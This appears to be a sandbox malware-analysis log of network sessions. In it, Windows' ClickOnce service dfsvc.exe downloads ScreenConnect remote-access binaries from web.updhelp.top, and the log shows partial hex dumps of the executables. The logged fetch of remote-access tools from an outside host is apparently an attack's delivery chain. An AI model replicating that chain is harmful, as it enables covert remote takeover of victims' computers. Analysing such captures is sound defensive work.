                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pyeKJ8aZt3FxQcRtCfmXVQv6MnoHhAqdiP7Npc%2Fs9ifgle2WP9LgPIHdoZCR9I9KQ8WQBHgV816AGi3IPzieO5b0JOvv1HfjhrlE%2BdubQO%2FScFf55M0cG60Oqtsk1Qe4nh8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec5c4f7a6779-ATL
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=106153&min_rtt=105846&rtt_var=22625&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=729&delivery_rate=38127&cwnd=252&unsent_bytes=0&cid=e474de54408df9f4&ts=886&x=0"
                                                                                                                  2025-04-12 15:58:07 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.2460854104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:07 UTC104OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  2025-04-12 15:58:08 UTC1100INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:08 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 81688
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.WindowsFileManager.exe"; filename*=UTF-8''ScreenConnect.WindowsFileManager.exe
                                                                                                                  CF-Cache-Status: BYPASS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GaAMznEMi442m097NAe%2FY94Rcz36Du1fegxHLiWpyEOKlw9rAJCEug0%2F1QH%2FaY81sKUbgngoCwDznOtH4ziuOacm%2B54p39WXuGUHIgzzjk0u3EOts3m3Xs4jDFZmGGR2BZU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec633867b0a6-ATL
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=105806&min_rtt=105777&rtt_var=22357&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=719&delivery_rate=38140&cwnd=252&unsent_bytes=0&cid=2c8b787b91e50bdc&ts=1002&x=0"
                                                                                                                  2025-04-12 15:58:08 UTC269INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3e f6 d5 c9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 a6 ab 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>"0@^ `@ `@
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: d1 00 00 00 00 00 00 00 00 00 00 00 16 01 00 18 29 00 00 00 40 01 00 0c 00 00 00 e0 5d 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec 3e 00 00 00 20 00 00 00 40 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 d1 00 00 00 60 00 00 00 d2 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 5e 00 00 00 00 00 00 48 00 00 00
                                                                                                                  Data Ascii: )@]8 H.text> @ `.rsrc`B@@.reloc@@B^H
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: 06 7b 06 00 00 04 06 7b 07 00 00 04 06 7b 08 00 00 04 28 3a 00 00 0a 26 06 16 7d 06 00 00 04 16 d3 03 04 05 28 46 00 00 0a 2a 22 0f 01 28 47 00 00 0a 2a 1e 02 28 32 00 00 0a 2a 4e 02 7b 42 00 00 04 03 8c 06 00 00 1b 6f 48 00 00 0a 03 2a 00 00 00 13 30 04 00 ec 00 00 00 04 00 00 11 05 28 42 00 00 0a 0a 06 7b 10 00 00 04 20 16 01 00 00 40 ca 00 00 00 02 7b 43 00 00 04 06 7b 11 00 00 04 06 7b 0f 00 00 04 6f 49 00 00 0a 06 7b 0f 00 00 04 20 00 79 00 00 16 28 4a 00 00 0a 39 9d 00 00 00 2b 0f 06 7b 0f 00 00 04 16 1f 40 28 4a 00 00 0a 26 06 7b 0f 00 00 04 16 16 28 4b 00 00 0a 0c 12 02 25 28 4c 00 00 0a 2d 04 26 16 2b 14 28 4d 00 00 0a 7b 4e 00 00 0a 20 00 08 00 00 28 04 00 00 2b 2d bf 12 03 fe 15 22 00 00 01 12 03 d0 22 00 00 01 28 2b 00 00 0a 28 3c 00 00 0a 7d
                                                                                                                  Data Ascii: {{{(:&}(F*"(G*(2*N{BoH*0(B{ @{C{{oI{ y(J9+{@(J&{(K%(L-&+(M{N (+-""(+(<}
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: 0b 80 00 00 33 04 17 0a 2b 02 16 0a 06 39 31 01 00 00 05 28 07 00 00 06 39 26 01 00 00 12 08 fe 15 2b 00 00 01 05 12 08 28 7f 00 00 0a 26 12 09 11 08 7b 5e 00 00 0a 11 08 7b 60 00 00 0a 28 80 00 00 0a 05 12 09 28 81 00 00 0a 26 05 28 82 00 00 0a 7e 3c 00 00 04 25 2d 13 26 14 fe 06 83 00 00 0a 73 84 00 00 0a 25 80 3c 00 00 04 28 09 00 00 2b 7e 3d 00 00 04 25 2d 13 26 14 fe 06 86 00 00 0a 73 87 00 00 0a 25 80 3d 00 00 04 28 0a 00 00 2b 7e 41 00 00 04 25 2d 17 26 7e 3f 00 00 04 fe 06 3d 00 00 06 73 89 00 00 0a 25 80 41 00 00 04 28 0b 00 00 2b 28 0c 00 00 2b 13 0a 05 28 79 00 00 0a 7e 3c 00 00 04 25 2d 13 26 14 fe 06 83 00 00 0a 73 84 00 00 0a 25 80 3c 00 00 04 28 09 00 00 2b 6f 7a 00 00 0a 13 05 2b 40 11 05 6f 7b 00 00 0a 13 0b 11 0b 28 86 00 00 0a 13 0c 12
                                                                                                                  Data Ascii: 3+91(9&+(&{^{`((&(~<%-&s%<(+~=%-&s%=(+~A%-&~?=s%A(+(+(y~<%-&s%<(+oz+@o{(
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: 4d 00 21 00 11 00 00 10 10 00 37 11 e8 11 4d 00 31 00 1b 00 a0 10 10 00 2c 0b e8 11 00 00 31 00 1c 00 a0 10 10 00 2b 0b e8 11 00 00 31 00 1c 00 a0 10 10 00 7b 11 e8 11 00 00 31 00 2f 00 a0 10 10 00 51 0a e8 11 00 00 31 00 33 00 a0 10 10 00 69 11 e8 11 00 00 31 00 33 00 01 01 00 00 a2 02 e8 11 c5 00 31 00 3a 00 01 01 00 00 d7 02 e8 11 c5 00 34 00 3a 00 83 01 10 00 87 02 00 00 4d 00 3c 00 3a 00 03 21 10 00 bc 03 00 00 4d 00 3f 00 3a 00 03 01 10 00 01 00 00 00 4d 00 42 00 3e 00 02 01 00 00 d2 02 00 00 c5 00 45 00 43 00 0b 01 10 00 4b 02 00 00 b5 00 49 00 43 00 26 00 3b 10 38 06 26 00 6d 0a 3c 06 26 00 24 0d 22 02 01 00 98 02 3f 06 06 00 a8 04 43 06 06 00 f4 04 46 06 06 00 62 0c 43 06 06 00 5b 0c 43 06 06 00 5b 0c 43 06 06 00 62 0c 43 06 06 00 f4 04 46 06 06
                                                                                                                  Data Ascii: M!7M1,1+1{1/Q13i131:4:M<:!M?:MB>ECKIC&;8&m<&$"?CFbC[C[CbCF
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: 00 80 00 c6 05 fa 0a 3c 07 3d 00 00 00 00 00 80 00 c6 05 ba 0b bc 06 3f 00 00 00 00 00 80 00 c6 05 92 0a c2 06 40 00 00 00 00 00 00 00 c6 05 7b 05 b6 06 42 00 00 00 00 00 00 00 c6 05 49 05 b6 06 43 00 00 00 00 00 80 00 c6 05 83 0d ca 06 44 00 00 00 00 00 00 00 c6 05 1c 05 b6 06 46 00 00 00 00 00 80 00 c6 05 83 07 ca 06 47 00 08 24 00 00 00 00 91 18 4a 0f 61 00 49 00 14 24 00 00 00 00 86 18 44 0f 06 00 49 00 1c 24 00 00 00 00 83 00 cb 00 4b 07 49 00 90 24 00 00 00 00 83 00 3c 01 52 07 4c 00 99 24 00 00 00 00 86 18 44 0f 06 00 4d 00 a1 24 00 00 00 00 83 00 a7 00 58 07 4d 00 b8 24 00 00 00 00 83 00 ff 00 4b 07 4e 00 b0 25 00 00 00 00 83 00 1d 01 60 07 51 00 30 28 00 00 00 00 83 00 28 01 6e 07 57 00 00 00 01 00 15 06 00 00 01 00 3b 0b 01 20 01 00 8a 04 01 20
                                                                                                                  Data Ascii: <=?@{BICDFG$JaI$DI$KI$<RL$DM$XM$KN%`Q0((nW;
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: 22 02 59 01 d1 0c 22 02 59 01 28 12 22 02 39 01 b4 06 b4 02 44 00 a1 00 bf 02 3c 00 f0 09 fd 01 a1 02 e1 12 c3 02 a9 02 44 0f c9 02 b9 02 30 13 d3 02 79 02 44 0f d9 02 c9 02 2e 12 e1 02 d1 02 44 0f 06 00 d1 02 ad 13 ea 02 d1 02 8c 12 f1 02 d1 02 b2 0a f8 02 d1 02 5a 10 ff 02 39 01 ce 0a 06 03 14 00 7a 0c 17 03 01 01 94 05 1e 03 e9 01 00 04 44 03 f9 02 be 13 68 03 f9 02 38 0d 6e 03 49 01 0e 0d 72 03 e1 01 34 0c 79 03 49 01 e6 05 8b 03 2c 00 f9 00 0f 02 e9 01 df 0f 8f 03 4c 00 36 0f a0 03 54 00 bf 12 fd 01 a9 00 1d 0b b1 03 a9 00 50 13 b9 03 21 03 13 13 f9 01 a9 00 ca 11 c1 03 61 01 44 0f ca 03 a9 00 e1 0c d0 03 e9 01 f5 0f d9 03 a9 00 d6 05 e3 03 5c 00 44 0f 7b 00 31 03 0c 07 ef 03 e9 01 33 06 08 04 64 00 44 0f 7b 00 31 03 e1 11 16 04 6c 00 44 0f 7b 00 31
                                                                                                                  Data Ascii: "Y"Y("9D<D0yD.DZ9zDh8nIr4yI,L6TP!aD\D{13dD{1lD{1
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: 5f 30 5f 32 00 46 75 6e 63 60 32 00 56 61 6c 75 65 54 75 70 6c 65 60 32 00 44 69 63 74 69 6f 6e 61 72 79 60 32 00 49 74 65 6d 32 00 3c 4d 61 69 6e 3e 62 5f 5f 33 00 56 61 6c 75 65 54 75 70 6c 65 60 33 00 49 74 65 6d 33 00 3c 4d 61 69 6e 3e 62 5f 5f 34 00 3c 4d 61 69 6e 3e 62 5f 5f 35 00 3c 3e 39 5f 5f 30 5f 36 00 3c 4d 61 69 6e 3e 62 5f 5f 30 5f 36 00 46 75 6e 63 60 37 00 3c 3e 39 00 3c 4d 6f 64 75 6c 65 3e 00 54 56 4d 5f 47 45 54 49 54 45 4d 41 00 68 44 43 00 47 43 00 48 4f 4f 4b 50 52 4f 43 00 57 49 4e 45 56 45 4e 54 50 52 4f 43 00 45 58 50 41 4e 44 45 44 00 54 56 47 4e 5f 4e 45 58 54 53 45 4c 45 43 54 45 44 00 67 65 74 5f 47 55 49 44 00 43 74 6c 49 44 00 69 74 65 6d 49 44 00 54 56 47 4e 5f 43 48 49 4c 44 00 42 4f 4c 44 00 54 56 45 5f 45 58 50 41 4e 44
                                                                                                                  Data Ascii: _0_2Func`2ValueTuple`2Dictionary`2Item2<Main>b__3ValueTuple`3Item3<Main>b__4<Main>b__5<>9__0_6<Main>b__0_6Func`7<>9<Module>TVM_GETITEMAhDCGCHOOKPROCWINEVENTPROCEXPANDEDTVGN_NEXTSELECTEDget_GUIDCtlIDitemIDTVGN_CHILDBOLDTVE_EXPAND
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: 65 00 3c 31 3e 5f 5f 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 53 65 74 54 69 74 6c 65 00 70 73 7a 54 69 74 6c 65 00 46 6f 6e 74 53 74 79 6c 65 00 47 65 74 46 69 6c 65 4e 61 6d 65 00 53 65 74 46 69 6c 65 4e 61 6d 65 00 47 65 74 57 69 6e 64 6f 77 43 6c 61 73 73 4e 61 6d 65 00 47 65 74 44 69 73 70 6c 61 79 4e 61 6d 65 00 70 73 7a 4e 61 6d 65 00 67 65 74 5f 57 69 6e 64 6f 77 46 72 61 6d 65 00 44 72 61 77 4c 69 6e 65 00 43 6f 6d 49 6e 74 65 72 66 61 63 65 54 79 70 65 00 43 6c 61 73 73 49 6e 74 65 72 66 61 63 65 54 79 70 65 00 70 69 46 69 6c 65 54 79 70 65 00 56 61 6c 75 65 54 79 70 65 00 43 74 6c 54 79 70 65 00 45 78 63 65 70 74 69 6f 6e 54 79 70 65 00 57 68 65 72 65 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6f 72 65 00 50 74 72 54 6f 53
                                                                                                                  Data Ascii: e<1>__GetWindowRectangleSetTitlepszTitleFontStyleGetFileNameSetFileNameGetWindowClassNameGetDisplayNamepszNameget_WindowFrameDrawLineComInterfaceTypeClassInterfaceTypepiFileTypeValueTypeCtlTypeExceptionTypeWhereScreenConnect.CorePtrToS
                                                                                                                  2025-04-12 15:58:08 UTC1369INData Raw: 00 50 74 72 54 6f 53 74 72 69 6e 67 41 6e 73 69 00 70 73 69 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 49 46 69 6c 65 44 69 61 6c 6f 67 45 76 65 6e 74 73 2e 4f 6e 46 69 6c 65 4f 6b 00 53 65 74 57 69 6e 45 76 65 6e 74 48 6f 6f 6b 00 73 74 61 74 65 4d 61 73 6b 00 66 4d 61 73 6b 00 6d 61 73 6b 00 41 6c 6c 6f 63 48 47 6c 6f 62 61 6c 00 46 72 65 65 48 47 6c 6f 62 61 6c 00 4d 61 72 73 68 61 6c 00 53 65 74 46 69 6c 65 4e 61 6d 65 4c 61 62 65 6c 00 53 65 74 4f 6b 42 75 74 74 6f 6e 4c 61 62 65 6c 00 70 73 7a 4c 61 62 65 6c 00 41 73 73 65 72 74 56 61 6c 75 65 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 64 77 49 44 43 74 6c 00 6c 50 61 72 61 6d 00 77 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 64 77 49 44 49 74 65 6d 00 67 65 74 5f 49 74 65 6d 00 73
                                                                                                                  Data Ascii: PtrToStringAnsipsiScreenConnect.IFileDialogEvents.OnFileOkSetWinEventHookstateMaskfMaskmaskAllocHGlobalFreeHGlobalMarshalSetFileNameLabelSetOkButtonLabelpszLabelAssertValueNonNullget_ControldwIDCtllParamwParamProgramdwIDItemget_Items


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.2460855104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:09 UTC93OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  2025-04-12 15:58:09 UTC1060INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:09 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 1726976
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.Windows.dll"; filename*=UTF-8''ScreenConnect.Windows.dll
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tnb5XBpAuIqV4eJog0eOC3DN3DSbHDZp5D1SequXM14%2FeUdVRgxubIeHzHDyOo02O3Zgwv1WFtuWiUllFQrIUXrIZAgw1vO3AwveAeynt7t45%2FIPPW8%2Fu%2BY6QdrMxLtl%2FRM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec6bdc027b92-ATL
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=105798&min_rtt=105789&rtt_var=22331&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=708&delivery_rate=38154&cwnd=252&unsent_bytes=0&cid=58c4cd6c853e006c&ts=857&x=0"
                                                                                                                  2025-04-12 15:58:09 UTC309INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 98 3d d4 b4 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 52 1a 00 00 06 00 00 00 00 00 00 0a 71 1a 00 00 20 00 00 00 80 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 1a 00 00 02 00 00 ad 2e 1b 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=" 0Rq .@
                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 51 1a 00 00 20 00 00 00 52 1a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 03 00 00 00 80 1a 00 00 04 00 00 00 54 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 1a 00 00 02 00 00 00 58 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 70 1a 00 00 00 00 00 48 00 00 00 02 00 05 00 94 af 00 00 d0 1b 02 00 09 00 00 00 00 00 00 00 64 cb 02 00 30 a4 17 00 94 6f 1a 00 80 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: H.textQ R `.rsrc|T@@.relocX@BpHd0o
                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 11 00 00 04 2a 22 02 03 7d 11 00 00 04 2a 1e 02 7b 12 00 00 04 2a 22 02 03 7d 12 00 00 04 2a 00 00 00 13 30 02 00 24 00 00 00 07 00 00 11 03 75 0d 00 00 02 0a 06 14 28 2a 00 00 06 2c 12 06 6f 21 00 00 06 02 28 21 00 00 06 28 5d 00 00 0a 2a 16 2a 13 30 01 00 0f 00 00 00 08 00 00 11 02 28 21 00 00 06 0a 12 00 28 5e 00 00 0a 2a 22 02 03 28 5f 00 00 0a 2a 2e 02 03 28 5f 00 00 0a 16 fe 01 2a 8a 02 7e 60 00 00 0a 28 5d 00 00 0a 2c 08 03 28 cb 00 00 06 14 2a 73 3e 00 00 06 25 02 6f 22 00 00 06 2a a6 02 7e 60 00 00 0a 28 5d 00 00 0a 2c 08 04 28 cb 00 00 06 14 2a 73 3e 00 00 06 25 02 6f 22 00 00 06 25 03 6f 26 00 00 06 2a 00 00 00 13 30 04 00 41 00 00 00 09 00 00 11 73 c4 02 00 06 0a 06 03 7d 8b 00 00 04 02 7e 60 00
                                                                                                                  Data Ascii: *"}*{*"}*{*"}*0$u(*,o!(!(]**0(!(^*"(_*.(_*~`(],(*s>%o"*~`(],(*s>%o"%o&*0As}~`
                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: 11 02 28 2e 00 00 0a 12 00 fe 15 d1 00 00 01 28 83 00 00 0a 0b 07 6f 84 00 00 0a 0c 08 6f 85 00 00 0a 28 46 02 00 06 0a de 14 08 2c 06 08 6f 11 00 00 0a dc 07 2c 06 07 6f 11 00 00 0a dc 02 02 fe 06 44 00 00 06 73 9b 03 00 06 7d 13 00 00 04 02 1f 0d 02 7b 13 00 00 04 06 16 28 d6 01 00 06 7d 14 00 00 04 2a 00 00 00 01 1c 00 00 02 00 1b 00 0e 29 00 0a 00 00 00 00 02 00 14 00 1f 33 00 0a 00 00 00 00 7e 02 7b 14 00 00 04 7e 60 00 00 0a 28 86 00 00 0a 2c 0c 02 7b 14 00 00 04 28 d7 01 00 06 26 2a 13 30 03 00 21 00 00 00 12 00 00 11 73 49 00 00 06 25 03 6f 46 00 00 06 0a 02 02 7b 15 00 00 04 06 28 0a 00 00 2b 06 6f 47 00 00 06 2a 00 00 00 13 30 03 00 29 00 00 00 13 00 00 11 02 7b 15 00 00 04 0a 06 0b 07 03 28 88 00 00 0a 74 01 00 00 1b 0c 02 7c 15 00 00 04 08 07
                                                                                                                  Data Ascii: (.(oo(F,o,oDs}{(}*)3~{~`(,{(&*0!sI%oF{(+oG*0){(t|
                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: 00 04 05 0f 04 28 9e 00 00 0a 6f 9f 00 00 0a 2b 12 02 7b 1c 00 00 04 02 7b 1d 00 00 04 05 6f a0 00 00 0a 02 7b 1c 00 00 04 6f a1 00 00 0a 2a 00 13 30 03 00 4a 00 00 00 00 00 00 00 02 7b 1e 00 00 04 2d 14 02 7b 1c 00 00 04 02 7b 1d 00 00 04 16 6f 9c 00 00 0a 2b 17 02 7b 1c 00 00 04 02 7b 1d 00 00 04 02 7b 1e 00 00 04 6f a0 00 00 0a 02 7b 1c 00 00 04 6f a1 00 00 0a 02 7b 1c 00 00 04 6f a2 00 00 0a 2a 00 00 13 30 05 00 0b 01 00 00 17 00 00 11 02 28 a3 00 00 0a 02 20 40 06 00 00 28 a4 00 00 0a 02 20 20 03 00 00 28 a5 00 00 0a 02 17 28 a6 00 00 0a 02 28 a7 00 00 0a 02 73 a8 00 00 0a 25 1b 6f a9 00 00 0a 25 17 6f aa 00 00 0a 25 17 6f ab 00 00 0a 25 16 6f ac 00 00 0a 25 19 6f ad 00 00 0a 25 0a 7d 21 00 00 04 06 6f ae 00 00 0a 02 28 a7 00 00 0a 02 73 a8 00 00 0a
                                                                                                                  Data Ascii: (o+{{o{o*0J{-{{o+{{{o{o{o*0( @( (((s%o%o%o%o%o%}!o(s
                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: 2c 00 07 00 00 00 00 1b 30 02 00 23 00 00 00 19 00 00 11 02 7b 1f 00 00 04 0a 06 28 4e 00 00 0a 02 7b 1f 00 00 04 03 6f dc 00 00 0a de 07 06 28 58 00 00 0a dc 2a 00 01 10 00 00 02 00 0d 00 0e 1b 00 07 00 00 00 00 32 02 7b 21 00 00 04 6f d8 00 00 0a 2a 1e 02 28 60 00 00 06 2a 1e 02 28 5e 00 00 06 2a ca 02 28 59 00 00 06 02 72 af 00 00 70 6f dd 00 00 0a 02 28 de 00 00 0a 22 00 00 00 41 73 df 00 00 0a 6f e0 00 00 0a 02 73 e1 00 00 0a 7d 23 00 00 04 2a 0a 14 2a 4e 02 28 e2 00 00 0a 28 6a 00 00 06 03 04 6f d7 02 00 06 2a 62 02 03 28 5d 00 00 06 03 6f d6 00 00 0a 1f 73 33 06 02 28 69 00 00 06 2a 42 02 02 7b 24 00 00 04 16 fe 01 7d 24 00 00 04 2a 00 00 00 13 30 03 00 6a 00 00 00 1a 00 00 11 02 7b 23 00 00 04 03 6f e3 00 00 0a 12 00 6f e4 00 00 0a 2d 53 03 d0 15
                                                                                                                  Data Ascii: ,0#{(N{o(X*2{!o*(`*(^*(Yrpo("Asos}#**N((jo*b(]os3(i*B{$}$*0j{#oo-S
                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: fe 1a 2a 00 00 00 01 10 00 00 00 00 c6 00 7d 43 01 09 15 00 00 01 1e 02 28 fb 00 00 0a 2a 1b 30 09 00 a7 02 00 00 1e 00 00 11 02 7b 2a 00 00 04 2d 0b 72 29 01 00 70 73 96 00 00 0a 7a 02 7b 28 00 00 04 39 7d 01 00 00 12 00 02 7c 29 00 00 04 28 fc 00 00 0a 02 7b 28 00 00 04 6f fd 00 00 0a 0b 12 01 28 fc 00 00 0a 59 02 7c 29 00 00 04 28 fe 00 00 0a 02 7b 28 00 00 04 6f fd 00 00 0a 0b 12 01 28 fe 00 00 0a 59 02 7b 28 00 00 04 6f ff 00 00 0a 0c 12 02 28 00 01 00 0a 02 7b 28 00 00 04 6f ff 00 00 0a 0c 12 02 28 01 01 00 0a 28 02 01 00 0a 02 7b 2b 00 00 04 2c 40 02 7b 2b 00 00 04 6f 03 01 00 0a 02 7b 28 00 00 04 6f ff 00 00 0a 0c 12 02 28 00 01 00 0a 32 20 02 7b 2b 00 00 04 6f 04 01 00 0a 02 7b 28 00 00 04 6f ff 00 00 0a 0c 12 02 28 01 01 00 0a 2f 3f 02 7b 2b 00
                                                                                                                  Data Ascii: *}C(*0{*-r)psz{(9}|)({(o(Y|)({(o(Y{(o({(o(({+,@{+o{(o(2 {+o{(o(/?{+
